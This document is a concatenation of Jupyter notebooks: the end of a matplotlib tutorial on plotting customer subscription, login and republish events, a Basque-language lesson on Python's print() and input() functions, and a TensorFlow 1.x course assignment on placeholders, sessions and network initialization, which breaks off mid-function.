        linewidth = 0.1, marker='|',
        markersize=50, mew=2, alpha=0.5,
        color='crimson', label='Subscription Ends')

ax.legend(loc='upper left', ncol=2)
ax.set_title("Customer Behavior")

# Remove y-axis ticks as we don't need it
ax.get_yaxis().set_visible(False)
###Output _____no_output_____
###Markdown From the chart above, we know that this account is a flapper with 4 subscriptions. On the last subscription, he/she is a same-day flapper. The last subscription started when the 3rd one ended, and thus we see magenta instead of blue or red here. Besides colors and alpha, there are more parameters in the `axes.plot()` function that you can play around with, depending on how you want to design your chart, such as the type of marker and marker size (we will go into more details for `marker` in the next tip). Read more about these parameters here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.plot.html
**TIP 2: What is the frequency and intensity of each action? Let's use different shapes and opacity level**
**This tip is handy when we need to visualize different events that can happen multiple times on the same day.**
Because Unbounce is a tool that helps marketers to publish and optimize their landing pages, we care about republish events. We want to understand:
* How often do customers republish their page as compared to logging in to the tool?
* How much/intensively do customers republish each time they log in?
To help answer these questions, we need to plot login and republish on the same chart. There are 2 problems with this:
* Customers can log in and republish on the same day
* Customers can do these actions many times on the same day
And to solve these problems, we can use different shapes (through `marker`) and opacity levels (through `alpha`) in the `axes.plot()` function. There are many marker types, but here I use *circles* for logins and *triangles* for republishes. You can find out other types here: https://matplotlib.org/3.1.1/api/markers_api.html#module-matplotlib.markers.
###Code
fig, ax = plt.subplots(figsize=(20, 5))

# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'],
        sample_subscription['vizline'],
        marker='|', linewidth = 0.1,
        markersize=50, mew=2, alpha=0.5,
        color='royalblue', label='Subscription Starts')

no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'],
        sample_subscription[no_expire_mask]['vizline'],
        linewidth = 0.1, marker='|',
        markersize=50, mew=2, alpha=0.5,
        color='crimson', label='Subscription Ends')

# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
        marker='o', markersize=11,
        alpha=0.3, color='darkseagreen',
        linewidth=0.1, label='Login')

ax.plot(sample_republished['action_date'], sample_republished['vizline'],
        marker='^', markersize=8,
        alpha=0.5, color='teal',
        linewidth=0.1, label='Republish')

ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
###Output _____no_output_____
###Markdown From the chart above, we can answer the two behavior questions:
* **How often do customers republish their page as compared to logging in to the tool?** -- During the first subscription, this customer logged in and republished almost every 2 weeks, but this frequency has reduced in following subscriptions. There are times that they logged in without republishing a page.
* **How much/intensively do customers republish each time they log in?** -- During all subscriptions, this account tends to republish many times when they logged in, hence we see darker-colored triangles. This suggests that they may republish every time they make changes to preview the page.
TIP 3: How is this account behavior compared to another's? Let's make sure we look at the same scale
**This tip is especially handy when you want to compare one entity to another.**
If we only look into one customer, we don't know whether this customer is a highly-engaged one, or whether this is a norm for all of our customer base. Although there are other statistical methods to check on customer behavior trends (especially when you have more customers than you can manually check), we can start by visualizing the behavior of different customers and compare them together. I like this method as an exploratory analysis. Because besides talking to customer-facing teams, this helps suggest hypotheses to confirm/deny with statistical models later on.
To make a more reasonable comparison, we want to make sure charts use the same scale. There can be customers who start their subscriptions early in the year, while some others start mid-year or end of the year. In this case, I want to limit my chart to show a date range from January 1st to December 31st.
We can use `axes.set_xlim()` function for this.Read more about `axes.set_xlim()` here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.set_xlim.html ###Code fig, ax = plt.subplots(figsize=(20, 5)) # Plot subscription starts and ends ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') # Plot login and republish events ax.plot(sample_login['action_date'], sample_login['vizline'], marker='o', markersize=11, alpha=0.3, color='darkseagreen', linewidth=0.1, label='Login') ax.plot(sample_republished['action_date'], sample_republished['vizline'], marker='^', markersize=8, alpha=0.5, color='teal', linewidth=0.1, label='Republish') # Limit date range datemin = pd.to_datetime('2019/01/01').date() datemax = pd.to_datetime('2019/12/31').date() ax.set_xlim(datemin, datemax) # Format date date_form = mdates.DateFormatter("%Y/%m/%d") ax.xaxis.set_major_formatter(date_form) # Ensure ticks fall once every other week (interval=2) ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2)) ax.xaxis.set_tick_params(rotation=40) ax.legend(loc='upper left', ncol=4) ax.set_title("Customer Behavior") ax.get_yaxis().set_visible(False) ###Output _____no_output_____ ###Markdown TIP 4: Make it reproducibleI'm a big fan of the rule of three inspired by [David Robinson](http://varianceexplained.org/r/ds-ml-ai/).> When you’ve written the same code 3 times, write a functionSince we're going to visualize the behavior of 4 customers in the dataset (obviously this is more than 3), I want to write a function. I love functions because we can make systematic changes to visualizations and save so much time copy-pasting those changes to each chart. ###Code def _get_sample_data(AccountCode): """This function gets subscription info, login events and republish events for the AccountCode input. Args: AccountCode (str): Account unique identification. Returns: pandas.core.frame.DataFrame: 3 dataframes with subscription info, login and republish events. """ sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == AccountCode] sample_republished = republished_df[republished_df['AccountCode'] == AccountCode] sample_login = login_df[login_df['AccountCode'] == AccountCode] # this is a constant for visualization purpose sample_subscription['vizline'] = 0.5 sample_republished['vizline'] = 0.5 sample_login['vizline'] = 0.5 return sample_subscription, sample_republished, sample_login def _visualize_customer_behavior(AccountCode): """This function visualizes customer behavior using subscription, login and republish events of a customer. Args: AccountCode (str): Account unique identification. Returns: matplotlib.figure.Figure: a visualization with subscription, login and republish events of a customer. 
""" sample_subscription, sample_republished, sample_login = _get_sample_data(AccountCode) fig, ax = plt.subplots(figsize=(20, 5)) # Plot subscription starts and ends ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') # Plot login and republish events ax.plot(sample_login['action_date'], sample_login['vizline'], marker='o', markersize=11, alpha=0.3, color='darkseagreen', linewidth=0.1, label='Login') ax.plot(sample_republished['action_date'], sample_republished['vizline'], marker='^', markersize=8, alpha=0.5, color='teal', linewidth=0.1, label='Republish') # Limit date range datemin = pd.to_datetime('2019/01/01').date() datemax = pd.to_datetime('2019/12/31').date() ax.set_xlim(datemin, datemax) # Show weekly date date_form = mdates.DateFormatter("%Y/%m/%d") ax.xaxis.set_major_formatter(date_form) # Ensure ticks fall once every other week (interval=2) ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2)) ax.xaxis.set_tick_params(rotation=40) ax.legend(loc='upper left', ncol=4) ax.set_title("Customer Behavior") ax.get_yaxis().set_visible(False) return fig _ = _visualize_customer_behavior('a') _ = _visualize_customer_behavior('b') _ = _visualize_customer_behavior('c') _ = _visualize_customer_behavior('d') ###Output _____no_output_____
KonputaziorakoSarrera-MAT/Gardenkiak/Oinarrizko datu sarrera eta irteera.ipynb
###Markdown Basic data input and output
As we saw in the previous sections, we use the `print()` function to display information on the screen. In this section we will also look at another basic input/output function, namely `input()` (these two functions, like all the others seen in the previous sections, are defined in Python's [*Built-in Functions*](https://docs.python.org/3/library/functions.html) collection). The `print()` function
It is a function for displaying information as text. It takes a collection of objects and shows the value of each one as text: ###Code
a = 1
b = 3.4
c = "kaixo"
print(a,b,c)
###Output 1 3.4 kaixo
###Markdown The objects we pass to the `print()` function are turned into character strings by means of the `str()` function, so that those texts can then be shown on the screen. Although we said that the function takes objects, we can use expressions when calling it (the object handed to the function will be the result of the expression): ###Code
print(a*4, b>=2, c+"?")
###Output 4 True kaixo?
###Markdown The arguments of Python functions can have default values. The `print()` function has four such arguments, which can be used to change its behavior (if nothing is specified, they keep their default value): ###Code
help(print)
###Output Help on built-in function print in module builtins:

print(...)
    print(value, ..., sep=' ', end='\n', file=sys.stdout, flush=False)
    
    Prints the values to a stream, or to sys.stdout by default.
    Optional keyword arguments:
    file:  a file-like object (stream); defaults to the current sys.stdout.
    sep:   string inserted between values, default a space.
    end:   string appended after the last value, default a newline.
    flush: whether to forcibly flush the stream.

###Markdown * `sep` &rarr; character string inserted between the values (by default, a space).
* `end` &rarr; character string appended at the end (by default, a new line).
* `file` &rarr; *where* to write (by default, the standard output).
* `flush` &rarr; whether or not to force *flushing*.
The `print()` function is peculiar, because it accepts an unlimited number of arguments. For this reason, if we want to give the `sep`, `end`, `file` or `flush` arguments a different value, we must use their names (this can always be done): ###Code
print(a*4, b>=2, c+"?", sep=" <--> ", end="\nTHE END\n")
###Output 4 <--> True <--> kaixo?
THE END
###Markdown Naming the arguments also lets us specify them in any order: ###Code
print(a*4, b>=2, c+"?", end="\nTHE END\n", sep=" <--> ")
###Output 4 <--> True <--> kaixo?
THE END
###Markdown Arguments specified by name are called *keyword* arguments, and they must always appear at the end: ###Code
print(end="\nTHE END\n", sep=" <--> ", a*4, b>=2, c+"?")
###Output _____no_output_____
###Markdown The `input()` function
The `input()` function uses the system's standard input to receive information from the user through the keyboard. This function halts execution until the user presses the *return* key. It then returns the text that the user typed: ###Code
a = input()
print("Ados,",a,"idatzi duzu")
###Output 12345
Ados, 12345 idatzi duzu
###Markdown The `input()` function has a `prompt` argument whose default value is `''`: ###Code
help(input)
###Output Help on method raw_input in module ipykernel.kernelbase:

raw_input(prompt='') method of ipykernel.ipkernel.IPythonKernel instance
    Forward raw_input to frontends
    
    Raises
    ------
    StdinNotImplentedError if active frontend doesn't support stdin.
###Markdown * `prompt` &rarr; the message that will be shown on the screen (by default, empty).
With this argument, we let the user know that we are waiting for them: ###Code
a = input("Idatzi balio bat: ")
print("Ados,",a,"idatzi duzu")
###Output Idatzi balio bat: 12345
Ados, 12345 idatzi duzu
###Markdown Two things to always keep in mind:
1. **SOMETHING** must be done with what the `input()` function returns (**store it**, for example).
2. The `input()` function returns a **CHARACTER STRING** (**it is not a number**). ###Code
a = input("Idatzi balio bat: ")
print("Jasotako", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)

a = int(a)
print("Orain", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)
###Output Idatzi balio bat: 12345
Jasotako 12345 balioa <class 'str'> motakoa da
a * 2 : 1234512345
Orain 12345 balioa <class 'int'> motakoa da
a * 2 : 24690
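###Markdown Added note (not part of the original notebook): converting the returned string with `int()` raises a `ValueError` if the user types something that is not a whole number, so it can be worth checking the text first. The `testua` value below is just an invented example. ###Code
# Added sketch: check the text before converting, instead of letting int() crash.
testua = "12a45"  # invented example of input that is not a valid integer
if testua.isdigit():
    print(int(testua) * 2)
else:
    print("Not a valid integer:", testua)
###Output _____no_output_____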
Course_2_Improving_Deep_Neural_Networks/wk3_Tensorflow+Tutorial.ipynb
###Markdown TensorFlow Tutorial
Welcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow:
- Initialize variables
- Start your own session
- Train algorithms
- Implement a Neural Network
Programming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. 1 - Exploring the Tensorflow Library
To start, you will import the library: ###Code
import math
import numpy as np
import h5py
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python.framework import ops
from tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict

%matplotlib inline
np.random.seed(1)
###Output _____no_output_____
###Markdown Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. $$loss = \mathcal{L}(\hat{y}, y) = (\hat y^{(i)} - y^{(i)})^2 \tag{1}$$ ###Code
y_hat = tf.constant(36, name='y_hat')            # Define y_hat constant. Set to 36.
y = tf.constant(39, name='y')                    # Define y. Set to 39

loss = tf.Variable((y - y_hat)**2, name='loss')  # Create a variable for the loss

init = tf.global_variables_initializer()         # When init is run later (session.run(init)),
                                                 # the loss variable will be initialized and ready to be computed
with tf.Session() as session:                    # Create a session and print the output
    session.run(init)                            # Initializes the variables
    print(session.run(loss))                     # Prints the loss
###Output 9
###Markdown Writing and running programs in TensorFlow has the following steps:
1. Create Tensors (variables) that are not yet executed/evaluated.
2. Write operations between those Tensors.
3. Initialize your Tensors.
4. Create a Session.
5. Run the Session. This will run the operations you'd written above.
Therefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value. Now let us look at an easy example. Run the cell below: ###Code
a = tf.constant(2)
b = tf.constant(10)
c = tf.multiply(a,b)
print(c)
###Output Tensor("Mul:0", shape=(), dtype=int32)
###Markdown As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type "int32". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it. ###Code
sess = tf.Session()
print(sess.run(c))
###Output 20
###Markdown Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. Next, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later.
To specify values for a placeholder, you can pass in values by using a "feed dictionary" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session. ###Code # Change the value of x in the feed_dict x = tf.placeholder(tf.int64, name = 'x') print(sess.run(2 * x, feed_dict = {x: 3})) sess.close() ###Output 6 ###Markdown When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. Here's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph. 1.1 - Linear functionLet's start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. **Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):```pythonX = tf.constant(np.random.randn(3,1), name = "X")```You might find the following functions helpful: - tf.matmul(..., ...) to do a matrix multiplication- tf.add(..., ...) to do an addition- np.random.randn(...) to initialize randomly ###Code # GRADED FUNCTION: linear_function def linear_function(): """ Implements a linear function: Initializes W to be a random tensor of shape (4,3) Initializes X to be a random tensor of shape (3,1) Initializes b to be a random tensor of shape (4,1) Returns: result -- runs the session for Y = WX + b """ np.random.seed(1) ### START CODE HERE ### (4 lines of code) X = tf.constant(np.random.randn(3,1), name = "X") W = tf.constant(np.random.randn(4,3), name = "W") b = tf.constant(np.random.randn(4,1), name = "b") Y = tf.add(tf.matmul(W, X), b) ### END CODE HERE ### # Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate ### START CODE HERE ### sess = tf.Session() result = sess.run(Y) ### END CODE HERE ### # close the session sess.close() return result print( "result = " + str(linear_function())) ###Output result = [[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] ###Markdown *** Expected Output ***: **result**[[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] 1.2 - Computing the sigmoid Great! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise let's compute the sigmoid function of an input. You will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. ** Exercise **: Implement the sigmoid function below. 
You should use the following: - `tf.placeholder(tf.float32, name = "...")`- `tf.sigmoid(...)`- `sess.run(..., feed_dict = {x: z})`Note that there are two typical ways to create and use sessions in tensorflow: **Method 1:**```pythonsess = tf.Session() # Run the variables initialization (if needed), run the operationsresult = sess.run(..., feed_dict = {...})sess.close() # Close the session```**Method 2:**```pythonwith tf.Session() as sess: # run the variables initialization (if needed), run the operations result = sess.run(..., feed_dict = {...}) # This takes care of closing the session for you :)``` ###Code # GRADED FUNCTION: sigmoid def sigmoid(z): """ Computes the sigmoid of z Arguments: z -- input value, scalar or vector Returns: results -- the sigmoid of z """ ### START CODE HERE ### ( approx. 4 lines of code) # Create a placeholder for x. Name it 'x'. x = tf.placeholder(tf.float32, name='x') # compute sigmoid(x) sigmoid = tf.sigmoid(x) # Create a session, and run it. Please use the method 2 explained above. # You should use a feed_dict to pass z's value to x. with tf.Session() as sess: # Run session and call the output "result" result = sess.run(sigmoid, feed_dict={x:z}) ### END CODE HERE ### return result print ("sigmoid(0) = " + str(sigmoid(0))) print ("sigmoid(12) = " + str(sigmoid(12))) ###Output sigmoid(0) = 0.5 sigmoid(12) = 0.999994 ###Markdown *** Expected Output ***: **sigmoid(0)**0.5 **sigmoid(12)**0.999994 **To summarize, you now know how to**:1. Create placeholders2. Specify the computation graph corresponding to operations you want to compute3. Create the session4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. 1.3 - Computing the CostYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: $$ J = - \frac{1}{m}  \sum_{i = 1}^m  \large ( \small y^{(i)} \log a^{ [2] (i)} + (1-y^{(i)})\log (1-a^{ [2] (i)} )\large )\small\tag{2}$$you can do it in one line of code in tensorflow!**Exercise**: Implement the cross entropy loss. The function you will use is: - `tf.nn.sigmoid_cross_entropy_with_logits(logits = ...,  labels = ...)`Your code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes$$- \frac{1}{m}  \sum_{i = 1}^m  \large ( \small y^{(i)} \log \sigma(z^{[2](i)}) + (1-y^{(i)})\log (1-\sigma(z^{[2](i)}))\large )\small\tag{2}$$ ###Code # GRADED FUNCTION: cost def cost(logits, labels): """ Computes the cost using the sigmoid cross entropy Arguments: logits -- vector containing z, output of the last linear unit (before the final sigmoid activation) labels -- vector of labels y (1 or 0) Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels" in the TensorFlow documentation. So logits will feed into z, and labels into y. Returns: cost -- runs the session of the cost (formula (2)) """ ### START CODE HERE ### # Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines) z = tf.placeholder(tf.float32, shape=np.shape(logits)) y = tf.placeholder(tf.float32, shape=np.shape(labels)) # Use the loss function (approx. 1 line) cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y) # Create a session (approx. 1 line). See method 1 above. sess = tf.Session() # Run the session (approx. 
1 line). cost = sess.run(cost,feed_dict={y:labels,z:logits}) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return cost logits = sigmoid(np.array([0.2,0.4,0.7,0.9])) cost = cost(logits, np.array([0,0,1,1])) print ("cost = " + str(cost)) ###Output cost = [ 1.00538719 1.03664088 0.41385433 0.39956614] ###Markdown ** Expected Output** : **cost** [ 1.00538719 1.03664088 0.41385433 0.39956614] 1.4 - Using One Hot encodingsMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:This is called a "one hot" encoding, because in the converted representation exactly one element of each column is "hot" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code (a numpy sketch is shown after Section 1.5). In tensorflow, you can use one line of code: - tf.one_hot(labels, depth, axis) **Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this. ###Code # GRADED FUNCTION: one_hot_matrix def one_hot_matrix(labels, C): """ Creates a matrix where the i-th row corresponds to the ith class number and the jth column corresponds to the jth training example. So if example j has label i, then entry (i,j) will be 1. Arguments: labels -- vector containing the labels C -- number of classes, the depth of the one hot dimension Returns: one_hot -- one hot matrix """ ### START CODE HERE ### # Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line) C = tf.constant(C) # Use tf.one_hot, be careful with the axis (approx. 1 line) one_hot_matrix = tf.one_hot(labels, C, axis=0) # Create the session (approx. 1 line) sess = tf.Session() # Run the session (approx. 1 line) one_hot = sess.run(one_hot_matrix) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return one_hot labels = np.array([1,2,3,0,2,1]) one_hot = one_hot_matrix(labels, C = 4) print ("one_hot = " + str(one_hot)) ###Output one_hot = [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] ###Markdown **Expected Output**: **one_hot** [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] 1.5 - Initialize with zeros and onesNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. **Exercise:** Implement the function below to take in a shape and return an array of ones of that shape. - tf.ones(shape) ###Code # GRADED FUNCTION: ones def ones(shape): """ Creates an array of ones of dimension shape Arguments: shape -- shape of the array you want to create Returns: ones -- array containing only ones """ ### START CODE HERE ### # Create "ones" tensor using tf.ones(...). (approx. 1 line) ones = tf.ones(shape) # Create the session (approx. 1 line) sess = tf.Session() # Run the session to compute 'ones' (approx. 1 line) ones = sess.run(ones) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return ones print ("ones = " + str(ones([3]))) ###Output ones = [ 1. 1. 1.] ###Markdown **Expected Output:** **ones** [ 1. 1. 1.] 
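###Markdown Section 1.4 above notes that the same one-hot conversion takes a few lines in plain numpy. For comparison, a minimal numpy sketch (illustration only, not part of the graded assignment) that mirrors `tf.one_hot(labels, C, axis=0)`:

```python
import numpy as np

def one_hot_numpy(labels, C):
    # Rows are classes and columns are examples, matching axis=0 above.
    one_hot = np.zeros((C, labels.size))
    one_hot[labels, np.arange(labels.size)] = 1
    return one_hot

print(one_hot_numpy(np.array([1, 2, 3, 0, 2, 1]), 4))  # same matrix as the expected output above
```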
2 - Building your first neural network in tensorflowIn this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model:- Create the computation graph- Run the graphLet's delve into the problem you'd like to solve! 2.0 - Problem statement: SIGNS DatasetOne afternoon, with some friends we decided to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language.- **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).- **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).Note that this is a subset of the SIGNS dataset. The complete dataset contains many more signs.Here are examples for each number, along with an explanation of how we represent the labels. These are the original pictures, before we lowered the image resolution to 64 by 64 pixels. **Figure 1**: SIGNS dataset Run the following code to load the dataset. ###Code # Loading the dataset X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset() ###Output _____no_output_____ ###Markdown Change the index below and run the cell to visualize some examples in the dataset. ###Code # Example of a picture index = 0 plt.imshow(X_train_orig[index]) print ("y = " + str(np.squeeze(Y_train_orig[:, index]))) ###Output y = 5 ###Markdown As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so. ###Code # Flatten the training and test images X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T # Normalize image vectors X_train = X_train_flatten/255. X_test = X_test_flatten/255. # Convert training and test labels to one hot matrices Y_train = convert_to_one_hot(Y_train_orig, 6) Y_test = convert_to_one_hot(Y_test_orig, 6) print ("number of training examples = " + str(X_train.shape[1])) print ("number of test examples = " + str(X_test.shape[1])) print ("X_train shape: " + str(X_train.shape)) print ("Y_train shape: " + str(Y_train.shape)) print ("X_test shape: " + str(X_test.shape)) print ("Y_test shape: " + str(Y_test.shape)) ###Output number of training examples = 1080 number of test examples = 120 X_train shape: (12288, 1080) Y_train shape: (6, 1080) X_test shape: (12288, 120) Y_test shape: (6, 120) ###Markdown **Note** that 12288 comes from $64 \times 64 \times 3$. Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing. **Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. **The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. 
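###Markdown To make that last statement concrete, here is a hedged numpy sketch of softmax (illustration only, not part of the assignment): for two classes, softmax reduces to the sigmoid applied to the difference of the two logits.

```python
import numpy as np

def softmax(z):
    # Subtract the max for numerical stability, then normalize to probabilities.
    e = np.exp(z - np.max(z))
    return e / e.sum()

print(softmax(np.array([2.0, 1.0, 0.1])))  # the entries sum to 1
```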
2.1 - Create placeholdersYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. **Exercise:** Implement the function below to create the placeholders in tensorflow. ###Code # GRADED FUNCTION: create_placeholders def create_placeholders(n_x, n_y): """ Creates the placeholders for the tensorflow session. Arguments: n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288) n_y -- scalar, number of classes (from 0 to 5, so -> 6) Returns: X -- placeholder for the data input, of shape [n_x, None] and dtype "float" Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float" Tips: - You will use None because it lets us be flexible on the number of examples you will use for the placeholders. In fact, the number of examples during test/train is different. """ ### START CODE HERE ### (approx. 2 lines) X = tf.placeholder(dtype=tf.float32, shape=[n_x, None]) Y = tf.placeholder(dtype=tf.float32, shape=[n_y, None]) ### END CODE HERE ### return X, Y X, Y = create_placeholders(12288, 6) print ("X = " + str(X)) print ("Y = " + str(Y)) ###Output X = Tensor("Placeholder_2:0", shape=(12288, ?), dtype=float32) Y = Tensor("Placeholder_3:0", shape=(6, ?), dtype=float32) ###Markdown **Expected Output**: **X** Tensor("Placeholder_1:0", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1) **Y** Tensor("Placeholder_2:0", shape=(6, ?), dtype=float32) (not necessarily Placeholder_2) 2.2 - Initializing the parametersYour second task is to initialize the parameters in tensorflow.**Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going to use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use: ```pythonW1 = tf.get_variable("W1", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))b1 = tf.get_variable("b1", [25,1], initializer = tf.zeros_initializer())```Please use `seed = 1` to make sure your results match ours. ###Code # GRADED FUNCTION: initialize_parameters def initialize_parameters(): """ Initializes parameters to build a neural network with tensorflow. The shapes are: W1 : [25, 12288] b1 : [25, 1] W2 : [12, 25] b2 : [12, 1] W3 : [6, 12] b3 : [6, 1] Returns: parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3 """ tf.set_random_seed(1) # so that your "random" numbers match ours ### START CODE HERE ### (approx. 
6 lines of code) W1 = tf.get_variable('W1', [25, 12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b1 = tf.get_variable('b1', [25, 1], initializer = tf.zeros_initializer()) W2 = tf.get_variable('W2', [12, 25], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b2 = tf.get_variable('b2', [12, 1], initializer = tf.zeros_initializer()) W3 = tf.get_variable('W3', [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b3 = tf.get_variable('b3', [6, 1], initializer = tf.zeros_initializer()) ### END CODE HERE ### parameters = {"W1": W1, "b1": b1, "W2": W2, "b2": b2, "W3": W3, "b3": b3} return parameters tf.reset_default_graph() with tf.Session() as sess: parameters = initialize_parameters() print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ###Output W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref> b1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref> W2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref> b2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref> ###Markdown **Expected Output**: **W1** **b1** **W2** **b2** As expected, the parameters haven't been evaluated yet. 2.3 - Forward propagation in tensorflow You will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: - `tf.add(...,...)` to do an addition- `tf.matmul(...,...)` to do a matrix multiplication- `tf.nn.relu(...)` to apply the ReLU activation**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`! ###Code # GRADED FUNCTION: forward_propagation def 